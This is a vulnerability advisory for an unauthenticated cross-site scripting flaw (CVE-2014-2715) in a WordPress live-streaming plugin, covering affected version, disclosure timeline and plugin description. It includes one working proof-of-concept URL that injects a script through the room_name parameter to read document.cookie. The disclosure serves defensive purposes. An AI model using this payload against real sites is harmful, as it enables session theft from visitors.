wp-plugin : videowhisper-live-streaming-integration – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : videowhisper-live-streaming-integration

 

Effected Version : 4.27.2 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wp-content/plugins/videowhisper-live-streaming-integration/ls/vv_login.php?room_name=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26

Vulnerable Parameter : room_name

Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=833654%40videowhisper-live-streaming-integration&old=833649%40videowhisper-live-streaming-integration&sfp_email=&sfph_mail=

Note:The same vulnerability was present in a Drupal module.

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-02

 
Plugin Status : Updated on 2014-01-06
 
Public Disclosure : June 12, 2014
 
CVE Number : CVE-2014-2715

 
Plugin Description :
 
VideoWhisper Live Streaming software integrates web applications to:
1. Broadcast video live,
2. Embed live video streaming and chat,
3. Embed live video streaming only.

Latest version includes:
* codec and quality settings
* iOS transcoding support for iPhone, iPad playback
* automated detection of iOS
* usage permissions by role, email, id, name
* premium channels
* limit broadcasting and watch time per channel
* stats
* P2P groups support for better, faster video streaming and lower rtmp server bandwidth usage
* channel setup and management page in frontend
* channel listings with live AJAX updates
* external broadcaster/player support with special RTMP side
* generate snapshots for external streams with special RTMP side
* custom ads in chat

Use this software for adding to your site, features like on Twitch TV, Justin TV, UStream tv, Mogulus, LiveStream, Stickam, Blog tv, Live yahoo or their clones and alternatives.

Administrators can restrict access to broadcasting and watching to certain users.

Also includes a plugin that provides a linking widget. The widget also displays online broadcasters and their show names.

There is a settings page with multiple parameters and permissions (what users can broadcast and watch).

= BuddyPress integration =
If BuddyPress is installed this will add a Live Stream tab to the group where users can watch live video and chat realtime. Admins can broadcast anytime from Admin > Live Streaming.

= Special requirements =
This plugin has requirements beyond regular WordPress hosting specifications: a RTMP host is needed for persistent connections to manage live interactions and streaming. More details about this, including solutions are provided on the Installation section pages.

Leave a Reply

Your email address will not be published. Required fields are marked *